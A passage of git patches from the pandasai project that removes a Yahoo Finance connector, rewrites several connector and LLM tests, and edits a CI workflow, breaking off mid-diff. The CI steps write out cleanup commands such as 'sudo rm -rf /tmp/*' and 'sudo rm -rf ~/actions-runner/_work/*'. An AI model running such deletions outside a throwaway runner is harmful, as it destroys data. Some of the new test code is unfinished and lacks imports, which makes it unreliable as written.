-from pandasai.connectors.base import BaseConnector, BaseConnectorConfig
-
-
-class YahooFinanceConnectorConfig(BaseConnectorConfig):
- """
- Connector configuration for Yahoo Finance.
- """
-
- dialect: str = "yahoo_finance"
- host: str = "yahoo.finance.com"
- database: str = "stock_data"
- host: str
-
-
-class YahooFinanceConnector(BaseConnector):
- """
- Yahoo Finance connector for retrieving stock data.
- """
-
- _cache_interval: int = 600 # 10 minutes
-
- def __init__(
- self,
- stock_ticker: Optional[str] = None,
- config: Optional[Union[YahooFinanceConnectorConfig, dict]] = None,
- cache_interval: int = 600,
- **kwargs,
- ):
- if not stock_ticker and not config:
- raise ValueError(
- "You must specify either a stock ticker or a config object."
- )
-
- try:
- import yfinance
- except ImportError as e:
- raise ImportError(
- "Could not import yfinance python package. "
- "Please install it with `pip install yfinance`."
- ) from e
-
- if not isinstance(config, YahooFinanceConnectorConfig):
- if not config:
- config = {}
-
- if stock_ticker:
- config["table"] = stock_ticker
-
- yahoo_finance_config = YahooFinanceConnectorConfig(**config)
- else:
- yahoo_finance_config = config
-
- self._cache_interval = cache_interval
- super().__init__(yahoo_finance_config)
- self.ticker = yfinance.Ticker(self.config.table)
-
- def head(self, n: int = 5) -> pd.DataFrame:
- """
- Return the head of the data source that the connector is connected to.
-
- Returns:
- DataFrame: The head of the data source that the connector is connected to.
- connected to.
- """
- return self.ticker.history(period=f"{n}d")
-
- def _get_cache_path(self, include_additional_filters: bool = False):
- """
- Return the path of the cache file.
-
- Returns:
- str: The path of the cache file.
- """
- cache_dir = os.path.join(os.getcwd(), "")
- try:
- cache_dir = os.path.join((find_project_root()), "cache")
- except ValueError:
- cache_dir = os.path.join(os.getcwd(), "cache")
-
- return os.path.join(cache_dir, f"{self.config.table}_data.parquet")
-
- def _get_cache_path(self):
- """
- Return the path of the cache file for Yahoo Finance data.
- """
- try:
- cache_dir = os.path.join((find_project_root()), "cache")
- except ValueError:
- cache_dir = os.path.join(os.getcwd(), "cache")
-
- os.makedirs(cache_dir, mode=DEFAULT_FILE_PERMISSIONS, exist_ok=True)
-
- return os.path.join(cache_dir, f"{self.config.table}_data.parquet")
-
- def _cached(self):
- """
- Return the cached Yahoo Finance data if it exists and is not older than the
- cache interval.
-
- Returns:
- DataFrame|None: The cached data if it exists and is not older than the cache
- interval, None otherwise.
- """
- cache_path = self._get_cache_path()
- if not os.path.exists(cache_path):
- return None
-
- # If the file is older than 1 day, delete it
- if os.path.getmtime(cache_path) < time.time() - self._cache_interval:
- if self.logger:
- self.logger.log(f"Deleting expired cached data from {cache_path}")
- os.remove(cache_path)
- return None
-
- if self.logger:
- self.logger.log(f"Loading cached data from {cache_path}")
-
- return cache_path
-
- def execute(self):
- """
- Execute the connector and return the result.
-
- Returns:
- DataFrame: The result of the connector.
- """
- if cached_path := self._cached():
- return pd.read_parquet(cached_path)
-
- # Use yfinance to retrieve historical stock data
- stock_data = self.ticker.history(period="max")
-
- # Save the result to the cache
- stock_data.to_parquet(self._get_cache_path())
-
- return stock_data
-
- @property
- def rows_count(self):
- """
- Return the number of rows in the data source that the connector is
- connected to.
-
- Returns:
- int: The number of rows in the data source that the connector is
- connected to.
- """
- stock_data = self.execute()
- return len(stock_data)
-
- @property
- def columns_count(self):
- """
- Return the number of columns in the data source that the connector is
- connected to.
-
- Returns:
- int: The number of columns in the data source that the connector is
- connected to.
- """
- stock_data = self.execute()
- return len(stock_data.columns)
-
- @property
- def column_hash(self):
- """
- Return the hash code that is unique to the columns of the data source
- that the connector is connected to.
-
- Returns:
- int: The hash code that is unique to the columns of the data source
- that the connector is connected to.
- """
- stock_data = self.execute()
- columns_str = "|".join(stock_data.columns)
- return hashlib.sha256(columns_str.encode("utf-8")).hexdigest()
-
- @property
- def fallback_name(self):
- """
- Return the fallback name of the connector.
-
- Returns:
- str: The fallback name of the connector.
- """
- return self.config.table
-
- @property
- def pandas_df(self):
- return self.execute()
diff --git a/extensions/connectors/yfinance/tests/test_yahoo_finance.py b/extensions/connectors/yfinance/tests/test_yahoo_finance.py
index c65437ba5..9d2f79d61 100644
--- a/extensions/connectors/yfinance/tests/test_yahoo_finance.py
+++ b/extensions/connectors/yfinance/tests/test_yahoo_finance.py
@@ -1,148 +1,51 @@
-from unittest.mock import Mock, patch
-
+import unittest
+from unittest.mock import patch, MagicMock
import pandas as pd
-import pytest
-import yfinance as yf
-from pandasai_yfinance.yahoo_finance import YahooFinanceConnector
+# Assuming the functions are in a module called yahoo_finance
from pandasai_yfinance import load_from_yahoo_finance
-@pytest.fixture
-def stock_ticker():
- return "AAPL"
-
-
-@pytest.fixture
-def config():
- return {"where": [["column1", "=", "value1"], ["column2", ">", "value2"]]}
-
-
-@pytest.fixture
-def cache_interval():
- return 600
-
-
-@pytest.fixture
-def yahoo_finance_connector(stock_ticker, config, cache_interval):
- return YahooFinanceConnector(stock_ticker, config, cache_interval)
-
-
-def test_head(yahoo_finance_connector):
- with patch.object(yf.Ticker, "history") as mock_history:
- mock_history.return_value = pd.DataFrame(
- {
- "Open": [1.0, 2.0, 3.0, 4.0, 5.0],
- "High": [2.0, 3.0, 4.0, 5.0, 6.0],
- "Low": [0.5, 1.5, 2.5, 3.5, 4.5],
- "Close": [1.5, 2.5, 3.5, 4.5, 5.5],
- "Volume": [100, 200, 300, 400, 500],
- }
- )
- expected_result = pd.DataFrame(
+class TestYahooFinanceLoader(unittest.TestCase):
+ @patch("yfinance.Ticker")
+ def test_load_from_yahoo_finance(self, MockTicker):
+ # Setup the mock return value for history method
+ mock_ticker_instance = MagicMock()
+ MockTicker.return_value = mock_ticker_instance
+ mock_ticker_instance.history.return_value = pd.DataFrame(
{
- "Open": [1.0, 2.0, 3.0, 4.0, 5.0],
- "High": [2.0, 3.0, 4.0, 5.0, 6.0],
- "Low": [0.5, 1.5, 2.5, 3.5, 4.5],
- "Close": [1.5, 2.5, 3.5, 4.5, 5.5],
- "Volume": [100, 200, 300, 400, 500],
- }
+ "Date": ["2025-01-01", "2025-01-02"],
+ "Open": [150, 152],
+ "High": [155, 157],
+ "Low": [148, 150],
+ "Close": [153, 155],
+ "Volume": [100000, 120000],
+ },
+ index=pd.to_datetime(["2025-01-01", "2025-01-02"]),
)
- assert yahoo_finance_connector.head().equals(expected_result)
-
-def test_get_cache_path(yahoo_finance_connector):
- with patch("os.path.join") as mock_join:
- expected_result = "../AAPL_data.parquet"
- mock_join.return_value = expected_result
- assert yahoo_finance_connector._get_cache_path() == expected_result
+ # Test data
+ connection_info = {"ticker": "AAPL", "period": "1d"}
+ query = (
+ ""
+ ) # Since the query parameter is not used, we can leave it as an empty string
+ # Call the function under test
+ result = load_from_yahoo_finance(connection_info, query)
-def test_rows_count(yahoo_finance_connector):
- with patch.object(yf.Ticker, "history") as mock_history:
- mock_history.return_value = pd.DataFrame(
- {
- "Open": [1.0, 2.0, 3.0, 4.0, 5.0],
- "High": [2.0, 3.0, 4.0, 5.0, 6.0],
- "Low": [0.5, 1.5, 2.5, 3.5, 4.5],
- "Close": [1.5, 2.5, 3.5, 4.5, 5.5],
- "Volume": [100, 200, 300, 400, 500],
- }
- )
- assert yahoo_finance_connector.rows_count == 5
-
-
-def test_columns_count(yahoo_finance_connector):
- with patch.object(yf.Ticker, "history") as mock_history:
- mock_history.return_value = pd.DataFrame(
- {
- "Open": [1.0, 2.0, 3.0, 4.0, 5.0],
- "High": [2.0, 3.0, 4.0, 5.0, 6.0],
- "Low": [0.5, 1.5, 2.5, 3.5, 4.5],
- "Close": [1.5, 2.5, 3.5, 4.5, 5.5],
- "Volume": [100, 200, 300, 400, 500],
- }
- )
- assert yahoo_finance_connector.columns_count == 5
-
-
-def test_fallback_name(yahoo_finance_connector, stock_ticker):
- assert yahoo_finance_connector.fallback_name == stock_ticker
-
-
-def test_load_from_yahoo_finance_default_period():
- # Arrange
- connection_info = {"ticker": "AAPL"}
- mock_ticker = Mock()
- mock_history = pd.DataFrame({"Close": [100, 101, 102]})
- mock_ticker.history.return_value = mock_history
-
- # Act
- with patch("yfinance.Ticker", return_value=mock_ticker) as mock_yf_ticker:
- result = load_from_yahoo_finance(connection_info, None)
-
- # Assert
- mock_yf_ticker.assert_called_once_with("AAPL")
- mock_ticker.history.assert_called_once_with(period="1mo")
- assert isinstance(result, str)
- assert "Close" in result
- assert "100" in result and "101" in result and "102" in result
-
-
-def test_load_from_yahoo_finance_custom_period():
- # Arrange
- connection_info = {"ticker": "GOOGL", "period": "3mo"}
- mock_ticker = Mock()
- mock_history = pd.DataFrame({"Close": [200, 201, 202]})
- mock_ticker.history.return_value = mock_history
-
- # Act
- with patch("yfinance.Ticker", return_value=mock_ticker) as mock_yf_ticker:
- result = load_from_yahoo_finance(connection_info, None)
+ # Assert that the Ticker method was called with the correct ticker symbol
+ MockTicker.assert_called_once_with("AAPL")
- # Assert
- mock_yf_ticker.assert_called_once_with("GOOGL")
- mock_ticker.history.assert_called_once_with(period="3mo")
- assert isinstance(result, str)
- assert "Close" in result
- assert "200" in result and "201" in result and "202" in result
+ # Assert that the history method was called with the correct period
+ mock_ticker_instance.history.assert_called_once_with(period="1d")
+ print(result)
-def test_load_from_yahoo_finance_query_ignored():
- # Arrange
- connection_info = {"ticker": "MSFT"}
- query = "This query should be ignored"
- mock_ticker = Mock()
- mock_history = pd.DataFrame({"Close": [300, 301, 302]})
- mock_ticker.history.return_value = mock_history
+ # Assert the result is a CSV string
+ self.assertTrue(result.startswith(",Date,Open,High,Low,Close,Volume"))
+ self.assertIn("2025-01-01", result)
+ self.assertIn("2025-01-02", result)
- # Act
- with patch("yfinance.Ticker", return_value=mock_ticker) as mock_yf_ticker:
- result = load_from_yahoo_finance(connection_info, query)
- # Assert
- mock_yf_ticker.assert_called_once_with("MSFT")
- mock_ticker.history.assert_called_once_with(period="1mo")
- assert isinstance(result, str)
- assert "Close" in result
- assert "300" in result and "301" in result and "302" in result
+if __name__ == "__main__":
+ unittest.main()
diff --git a/extensions/ee/connectors/databricks/pandasai_databricks/__init__.py b/extensions/ee/connectors/databricks/pandasai_databricks/__init__.py
index fefeaf3c8..8ad6ee5b3 100644
--- a/extensions/ee/connectors/databricks/pandasai_databricks/__init__.py
+++ b/extensions/ee/connectors/databricks/pandasai_databricks/__init__.py
@@ -1,4 +1,3 @@
-from .databricks import DatabricksConnector
import pandas as pd
from databricks import sql
@@ -48,4 +47,4 @@ def load_from_databricks(config):
connection.close()
-__all__ = ["DatabricksConnector", "load_from_databricks"]
+__all__ = ["load_from_databricks"]
diff --git a/extensions/ee/connectors/databricks/tests/test_databricks.py b/extensions/ee/connectors/databricks/tests/test_databricks.py
index e33f510ee..f8c3ef041 100644
--- a/extensions/ee/connectors/databricks/tests/test_databricks.py
+++ b/extensions/ee/connectors/databricks/tests/test_databricks.py
@@ -1,80 +1,131 @@
import unittest
-from unittest.mock import Mock, patch
+from unittest.mock import patch, MagicMock
+from pandasai_databricks import (
+ load_from_databricks,
+)
-import pandas as pd
-from pandasai_databricks.databricks import (
- DatabricksConnector,
- DatabricksConnectorConfig,
-)
+class TestDatabricksLoader(unittest.TestCase):
+ @patch("databricks.sql.connect")
+ def test_load_from_databricks_with_query(self, MockConnect):
+ # Mock the connection and cursor
+ mock_connection = MagicMock()
+ MockConnect.return_value = mock_connection
+ mock_cursor = MagicMock()
+ mock_connection.cursor.return_value = mock_cursor
+
+ # Sample data that would be returned by Databricks SQL
+ mock_cursor.fetchall.return_value = [
+ (1, "Alice", 100),
+ (2, "Bob", 200),
+ ]
+ mock_cursor.description = [("id",), ("name",), ("value",)]
+ # Test config with a custom SQL query
+ config = {
+ "host": "databricks_host",
+ "http_path": "http_path",
+ "token": "access_token",
+ "query": "SELECT * FROM sample_table",
+ }
-class TestDataBricksConnector(unittest.TestCase):
- @patch("pandasai_databricks.databricks.sql")
- def setUp(self, mock_sql):
- # Create mock connection and cursor
- self.mock_cursor = Mock()
- self.mock_connection = Mock()
- self.mock_connection.cursor.return_value = self.mock_cursor
- mock_sql.connect.return_value = self.mock_connection
-
- # Define your ConnectorConfig instance here
- self.config = DatabricksConnectorConfig(
- dialect="databricks",
- host="ehxzojy-ue47135",
- token="token",
- database="DATABRICKS_SAMPLE_DATA",
- http_path="/sql/1.0/warehouses/1241rsa32",
- table="lineitem",
- where=[["column_name", "=", "value"]],
- ).dict()
-
- # Create an instance of DatabricksConnector
- self.connector = DatabricksConnector(self.config)
-
- def test_constructor_and_properties(self):
- self.assertEqual(self.connector.config.model_dump(), self.config)
- self.assertEqual(self.connector._connection, self.mock_connection)
- self.assertEqual(self.connector._cursor, self.mock_cursor)
- self.assertEqual(self.connector._cache_interval, 600)
-
- def test_repr_method(self):
- expected_repr = (
- ""
- )
- self.assertEqual(repr(self.connector), expected_repr)
-
- def test_build_query_method(self):
- # Test _build_query method
- query = self.connector._build_query(limit=5, order="RANDOM()")
- expected_query = """SELECT *
-FROM lineitem
-WHERE column_name = :value_0 ORDER BY RANDOM() ASC
- LIMIT :param_1"""
-
- self.assertEqual(str(query), expected_query)
-
- @patch(
- "pandasai_snowflake.snowflake.pd.read_sql",
- autospec=True,
- )
- def test_head_method(self, mock_read_sql):
- expected_data = pd.DataFrame({"Column1": [1, 2, 3], "Column2": [4, 5, 6]})
- mock_read_sql.return_value = expected_data
- head_data = self.connector.head()
- pd.testing.assert_frame_equal(head_data, expected_data)
-
- def test_rows_count_property(self):
- # Test rows_count property
- self.connector._rows_count = None
- self.mock_connection.execute.return_value.fetchone.return_value = (
- 50,
- ) # Sample rows count
- rows_count = self.connector.rows_count
- self.assertEqual(rows_count, 50)
-
- def test_columns_count_property(self):
- # Test columns_count property
- self.connector._columns_count = None
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- columns_count = self.connector.columns_count
- self.assertEqual(columns_count, 2)
-
- def test_column_hash_property(self):
- # Test column_hash property
- mock_df = Mock()
- mock_df.columns = ["Column1", "Column2"]
- self.connector.head = Mock(return_value=mock_df)
- column_hash = self.connector.column_hash
- self.assertIsNotNone(column_hash)
- self.assertEqual(
- column_hash,
- "ea6a80582b83e1511f8be83412b13e7b86d20c45b96fcf9731f3b99dc3b568aa",
+class TestSnowflakeLoader(unittest.TestCase):
+ @patch("snowflake.connector.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_snowflake_success(self, mock_read_sql, mock_connect):
+ # Mock the connection
+ mock_connection = MagicMock()
+ mock_connect.return_value = mock_connection
+
+ # Sample data returned by the Snowflake query
+ mock_data = [(1, "Alice", 100), (2, "Bob", 200)]
+ mock_read_sql.return_value = pd.DataFrame(
+ mock_data, columns=["id", "name", "value"]
)
- def test_fallback_name_property(self):
- # Test fallback_name property
- fallback_name = self.connector.fallback_name
- self.assertEqual(fallback_name, "lineitem")
-
-
-class TestLoadFromSnowflake(unittest.TestCase):
- @patch("pandasai_snowflake.connector.connect")
- @patch("pandasai_snowflake.pd.read_sql")
- def test_load_from_snowflake(self, mock_read_sql, mock_connect):
- # Mock the connection info
- connection_info = {
- "account": "test_account",
- "user": "test_user",
- "password": "test_password",
- "warehouse": "test_warehouse",
- "database": "test_db",
- "schema": "test_schema",
- "role": "test_role",
+ # Test config for Snowflake connection
+ config = {
+ "account": "snowflake_account",
+ "user": "username",
+ "password": "password",
+ "warehouse": "warehouse_name",
+ "database": "database_name",
+ "schema": "schema_name",
}
+ query = "SELECT * FROM users"
- # Mock the query
- query = "SELECT * FROM test_table"
-
- # Mock the connection
- mock_conn = Mock()
- mock_connect.return_value = mock_conn
-
- # Mock the query result
- expected_df = pd.DataFrame({"col1": [1, 2], "col2": ["a", "b"]})
- mock_read_sql.return_value = expected_df
-
- # Call the function
- result = load_from_snowflake(connection_info, query)
+ # Call the function under test
+ result = load_from_snowflake(config, query)
- # Assert that connect was called with the correct arguments
+ # Assertions
mock_connect.assert_called_once_with(
- account="test_account",
- user="test_user",
- password="test_password",
- warehouse="test_warehouse",
- database="test_db",
- schema="test_schema",
- role="test_role",
+ account="snowflake_account",
+ user="username",
+ password="password",
+ warehouse="warehouse_name",
+ database="database_name",
+ schema="schema_name",
+ role=None,
)
+ mock_read_sql.assert_called_once_with(query, mock_connection)
+ self.assertEqual(result.shape[0], 2) # 2 rows
+ self.assertEqual(result.shape[1], 3) # 3 columns
+ self.assertTrue("id" in result.columns)
+ self.assertTrue("name" in result.columns)
+ self.assertTrue("value" in result.columns)
+
+ @patch("snowflake.connector.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_snowflake_with_optional_role(self, mock_read_sql, mock_connect):
+ # Mock the connection
+ mock_connection = MagicMock()
+ mock_connect.return_value = mock_connection
- # Assert that read_sql was called with the correct arguments
- mock_read_sql.assert_called_once_with(query, mock_conn)
-
- # Assert that the result is the expected DataFrame
- pd.testing.assert_frame_equal(result, expected_df)
+ # Sample data returned by the Snowflake query
+ mock_data = [(1, "Alice", 100), (2, "Bob", 200)]
+ mock_read_sql.return_value = pd.DataFrame(
+ mock_data, columns=["id", "name", "value"]
+ )
- @patch("pandasai_snowflake.connector.connect")
- @patch("pandasai_snowflake.pd.read_sql")
- def test_load_from_snowflake_empty_result(self, mock_read_sql, mock_connect):
- connection_info = {
- "account": "test_account",
- "user": "test_user",
- "password": "test_password",
- "warehouse": "test_warehouse",
- "database": "test_db",
- "schema": "test_schema",
- "role": "test_role",
+ # Test config for Snowflake connection with role
+ config = {
+ "account": "snowflake_account",
+ "user": "username",
+ "password": "password",
+ "warehouse": "warehouse_name",
+ "database": "database_name",
+ "schema": "schema_name",
+ "role": "role_name",
}
+ query = "SELECT * FROM users"
- query = "SELECT * FROM empty_table"
-
- mock_conn = Mock()
- mock_connect.return_value = mock_conn
-
- # Mock an empty DataFrame as the query result
- expected_df = pd.DataFrame()
- mock_read_sql.return_value = expected_df
-
- result = load_from_snowflake(connection_info, query)
+ # Call the function under test
+ result = load_from_snowflake(config, query)
+ # Assertions
mock_connect.assert_called_once_with(
- account="test_account",
- user="test_user",
- password="test_password",
- warehouse="test_warehouse",
- database="test_db",
- schema="test_schema",
- role="test_role",
+ account="snowflake_account",
+ user="username",
+ password="password",
+ warehouse="warehouse_name",
+ database="database_name",
+ schema="schema_name",
+ role="role_name",
)
-
- mock_read_sql.assert_called_once_with(query, mock_conn)
-
- pd.testing.assert_frame_equal(result, expected_df)
-
- @patch("pandasai_snowflake.connector.connect")
- @patch("pandasai_snowflake.pd.read_sql")
- def test_load_from_snowflake_without_optional_params(
- self, mock_read_sql, mock_connect
- ):
- connection_info = {
- "account": "test_account",
- "user": "test_user",
- "password": "test_password",
- "warehouse": "test_warehouse",
- "database": "test_db",
+ mock_read_sql.assert_called_once_with(query, mock_connection)
+ self.assertEqual(result.shape[0], 2)
+ self.assertEqual(result.shape[1], 3)
+ self.assertTrue("id" in result.columns)
+ self.assertTrue("name" in result.columns)
+ self.assertTrue("value" in result.columns)
+
+ @patch("snowflake.connector.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_snowflake_empty_result(self, mock_read_sql, mock_connect):
+ # Mock the connection and cursor
+ mock_connection = MagicMock()
+ mock_connect.return_value = mock_connection
+
+ # Return an empty result set
+ mock_read_sql.return_value = pd.DataFrame(columns=["id", "name", "value"])
+
+ # Test config for Snowflake connection
+ config = {
+ "account": "snowflake_account",
+ "user": "username",
+ "password": "password",
+ "warehouse": "warehouse_name",
+ "database": "database_name",
+ "schema": "schema_name",
}
+ query = "SELECT * FROM empty_table"
- query = "SELECT * FROM test_table"
-
- mock_conn = Mock()
- mock_connect.return_value = mock_conn
+ # Call the function under test
+ result = load_from_snowflake(config, query)
- expected_df = pd.DataFrame({"col1": [1, 2], "col2": ["a", "b"]})
- mock_read_sql.return_value = expected_df
+ # Assertions
+ self.assertTrue(result.empty) # Result should be an empty DataFrame
- result = load_from_snowflake(connection_info, query)
+ @patch("snowflake.connector.connect")
+ def test_load_from_snowflake_missing_params(self, mock_connect):
+ # Test config with missing parameters (account, user, etc.)
+ config = {
+ "warehouse": "warehouse_name",
+ "database": "database_name",
+ "schema": "schema_name",
+ }
+ query = "SELECT * FROM users"
+
+ # Call the function under test and assert that it raises a KeyError
+ with self.assertRaises(KeyError):
+ load_from_snowflake(config, query)
+
+ @patch("snowflake.connector.connect")
+ @patch("pandas.read_sql")
+ def test_load_from_snowflake_invalid_query(self, mock_read_sql, mock_connect):
+ # Mock the connection and cursor
+ mock_connection = MagicMock()
+ mock_connect.return_value = mock_connection
+
+ # Simulate an invalid SQL query
+ mock_read_sql.side_effect = Exception("SQL error")
+
+ # Test config for Snowflake connection
+ config = {
+ "account": "snowflake_account",
+ "user": "username",
+ "password": "password",
+ "warehouse": "warehouse_name",
+ "database": "database_name",
+ "schema": "schema_name",
+ }
+ query = "INVALID SQL QUERY"
- mock_connect.assert_called_once_with(
- account="test_account",
- user="test_user",
- password="test_password",
- warehouse="test_warehouse",
- database="test_db",
- schema=None,
- role=None,
- )
+ # Call the function under test and assert that it raises an Exception
+ with self.assertRaises(Exception):
+ load_from_snowflake(config, query)
- mock_read_sql.assert_called_once_with(query, mock_conn)
- pd.testing.assert_frame_equal(result, expected_df)
+if __name__ == "__main__":
+ unittest.main()
diff --git a/extensions/llms/huggingface/tests/test_huggingface_text_gen.py b/extensions/llms/huggingface/tests/test_huggingface_text_gen.py
index 6e5bb665a..155e3eb8e 100644
--- a/extensions/llms/huggingface/tests/test_huggingface_text_gen.py
+++ b/extensions/llms/huggingface/tests/test_huggingface_text_gen.py
@@ -1,8 +1,9 @@
"""Unit tests for the HuggingFaceTextGen LLM class"""
+
from pandasai_huggingface.huggingface_text_gen import (
HuggingFaceTextGen,
)
-from pandasai.prompts import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
class MockBasePrompt(BasePrompt):
diff --git a/extensions/llms/langchain/tests/test_langchain_llm.py b/extensions/llms/langchain/tests/test_langchain_llm.py
index 3e423a1ef..eefa8a6fb 100644
--- a/extensions/llms/langchain/tests/test_langchain_llm.py
+++ b/extensions/llms/langchain/tests/test_langchain_llm.py
@@ -10,8 +10,9 @@
LLMResult,
)
+from pandasai.llm.base import LLM
from pandasai_langchain.langchain import LangchainLLM
-from pandasai.prompts import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
class TestLangchainLLM:
@@ -71,15 +72,29 @@ def test_agent_integration(self):
from pandasai.agent import Agent
from unittest.mock import MagicMock, PropertyMock
- mock_langchain_llm = MagicMock()
+ class FakeChatOpenAI(LLM):
+ openai_api_key: str = "fake_key"
+
+ @property
+ def type(self) -> str:
+ return "langchain_openai"
+
+ def call(self, prompts, stop=None, run_manager=None, **kwargs):
+ generation = ChatGeneration(
+ message=AIMessage(content="Custom response")
+ )
+ return LLMResult(generations=[[generation]])
+
+ mock_langchain_llm = FakeChatOpenAI()
type_property = PropertyMock(return_value="openai")
type(mock_langchain_llm)._llm_type = type_property
mock_langchain_llm.openai_api_key = "fake_key"
mock_langchain_llm.call = lambda instruction, suffix: "Custom response"
agent = Agent(
- [MagicMock()],
- {"llm": mock_langchain_llm},
+ dfs=[MagicMock()],
+ config={"llm": mock_langchain_llm},
vectorstore=MagicMock(),
)
- assert agent.context.config.llm.type == "langchain_openai"
+ print(agent._state.config.llm.type)
+ assert agent._state.config.llm.type == "langchain_openai"
diff --git a/extensions/llms/local/tests/test_local_llm.py b/extensions/llms/local/tests/test_local_llm.py
index 4d9ccfcad..d3734d755 100644
--- a/extensions/llms/local/tests/test_local_llm.py
+++ b/extensions/llms/local/tests/test_local_llm.py
@@ -6,7 +6,7 @@
from pandasai.helpers.memory import Memory
from pandasai_local.local_llm import LocalLLM
-from pandasai.prompts import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
@pytest.fixture
diff --git a/extensions/llms/openai/tests/test_openai.py b/extensions/llms/openai/tests/test_openai.py
index e48044179..a37af2db5 100644
--- a/extensions/llms/openai/tests/test_openai.py
+++ b/extensions/llms/openai/tests/test_openai.py
@@ -1,4 +1,5 @@
"""Unit tests for the openai LLM class"""
+
import openai
import pytest
from unittest import mock
@@ -6,7 +7,7 @@
from pandasai.exceptions import APIKeyNotFoundError, UnsupportedModelError
from extensions.llms.openai.pandasai_openai import OpenAI
-from pandasai.prompts import BasePrompt
+from pandasai.core.prompts.base import BasePrompt
class OpenAIObject:
From 466b0791125ae18c7dc3e8fb1384a7a0bea07675 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:34:56 +0100
Subject: [PATCH 37/58] fix: ci clear cache and suggested improvements
---
.github/workflows/ci.yml | 12 ++++++++++++
extensions/connectors/sql/tests/test_sql.py | 6 +++---
2 files changed, 15 insertions(+), 3 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index 368b8f1c0..f729274a2 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -20,6 +20,12 @@ jobs:
with:
python-version: ${{ matrix.python-version }}
+ - name: Clean up space before job
+ run: |
+ echo "Cleaning up space"
+ rm -rf /tmp/* # Clear temporary files
+ df -h # Check disk usage
+
- name: Install Poetry (Unix)
if: matrix.os != 'windows-latest'
run: |
@@ -145,3 +151,9 @@ jobs:
flags: unittests
name: codecov-umbrella
fail_ci_if_error: false
+
+ - name: Clean up space after job
+ run: |
+ echo "Cleaning up space after job"
+ rm -rf /tmp/* # Clear temporary files
+ df -h # Check disk usage
diff --git a/extensions/connectors/sql/tests/test_sql.py b/extensions/connectors/sql/tests/test_sql.py
index 0b5e78927..27f1bc92e 100644
--- a/extensions/connectors/sql/tests/test_sql.py
+++ b/extensions/connectors/sql/tests/test_sql.py
@@ -110,10 +110,10 @@ def test_load_from_sqlite(self, mock_read_sql, mock_sqlite3_connect):
@patch("psycopg2.connect")
@patch("pandas.read_sql")
- def test_load_from_cockroachdb(self, mock_read_sql, mock_cockroachdb_connect):
+ def test_load_from_cockroachdb(self, mock_read_sql, mock_postgresql_connect):
# Setup the mock return values
mock_conn = MagicMock()
- mock_cockroachdb_connect.return_value = mock_conn
+ mock_postgresql_connect.return_value = mock_conn
mock_read_sql.return_value = pd.DataFrame(
{"column1": [13, 14], "column2": [15, 16]}
)
@@ -131,7 +131,7 @@ def test_load_from_cockroachdb(self, mock_read_sql, mock_cockroachdb_connect):
result = load_from_cockroachdb(connection_info, query)
# Assert that the connection is made and SQL query is executed
- mock_cockroachdb_connect.assert_called_once_with(
+ mock_postgresql_connect.assert_called_once_with(
host="localhost",
user="root",
password="password",
From 575f852fdb6e344d14c4c3779e87f4f951c6cfd8 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:37:49 +0100
Subject: [PATCH 38/58] clean up before running CI
---
.github/workflows/ci.yml | 9 +++++----
1 file changed, 5 insertions(+), 4 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index f729274a2..e003e8a6c 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -23,8 +23,9 @@ jobs:
- name: Clean up space before job
run: |
echo "Cleaning up space"
- rm -rf /tmp/* # Clear temporary files
- df -h # Check disk usage
+ sudo rm -rf /tmp/*
+ sudo rm -rf ~/.cache/pip
+ sudo rm -rf ~/actions-runner/_work/*
- name: Install Poetry (Unix)
if: matrix.os != 'windows-latest'
@@ -155,5 +156,5 @@ jobs:
- name: Clean up space after job
run: |
echo "Cleaning up space after job"
- rm -rf /tmp/* # Clear temporary files
- df -h # Check disk usage
+ sudo rm -rf /tmp/* # Clear temporary files
+ sudo df -h # Check disk usage
From 0c6e5ce697154d50dbd231226e290e58a130ae13 Mon Sep 17 00:00:00 2001
From: ArslanSaleem
Date: Wed, 8 Jan 2025 16:48:17 +0100
Subject: [PATCH 39/58] fix ci pipeline
---
.github/workflows/ci.yml | 134 +++++++++++++++++++++------------------
1 file changed, 71 insertions(+), 63 deletions(-)
diff --git a/.github/workflows/ci.yml b/.github/workflows/ci.yml
index e003e8a6c..40a352962 100644
--- a/.github/workflows/ci.yml
+++ b/.github/workflows/ci.yml
@@ -20,13 +20,6 @@ jobs:
with:
python-version: ${{ matrix.python-version }}
- - name: Clean up space before job
- run: |
- echo "Cleaning up space"
- sudo rm -rf /tmp/*
- sudo rm -rf ~/.cache/pip
- sudo rm -rf ~/actions-runner/_work/*
-
- name: Install Poetry (Unix)
if: matrix.os != 'windows-latest'
run: |
@@ -45,62 +38,83 @@ jobs:
run: pip wheel --use-pep517 "future==0.18.3"
- name: Install dependencies
run: poetry install --all-extras --with dev --verbose
- - name: Install extension dependencies
- if: matrix.os != 'windows-latest'
- run: |
- find extensions/ -mindepth 1 -type d \( \
- -path "extensions/llms/*" -o \
- -path "extensions/connectors/*" -o \
- -path "extensions/ee/*/*" \) | while read -r dir; do
- if [ -f "$dir/pyproject.toml" ]; then
- echo "Installing dependencies for $dir"
- (
- cd "$dir" || exit
- poetry install --all-extras
- )
- fi
- done
- - name: Install extension dependencies (Windows)
- if: matrix.os == 'windows-latest'
- run: |
- # Install LLM extension dependencies
- Get-ChildItem -Path extensions/llms -Directory | ForEach-Object {
- $projFile = Join-Path $_.FullName "pyproject.toml"
- if (Test-Path $projFile) {
- Write-Host "Installing dependencies for $_"
- Push-Location $_.FullName
- poetry install --all-extras
- Pop-Location
- }
- }
-
- # Install connector extension dependencies
- Get-ChildItem -Path extensions/connectors -Directory | ForEach-Object {
- $projFile = Join-Path $_.FullName "pyproject.toml"
- if (Test-Path $projFile) {
- Write-Host "Installing dependencies for $_"
- Push-Location $_.FullName
- poetry install --all-extras
- Pop-Location
- }
- }
-
- # Install enterprise extension dependencies
- Get-ChildItem -Path extensions/ee -Recurse -Directory -Depth 2 | ForEach-Object {
- $projFile = Join-Path $_.FullName "pyproject.toml"
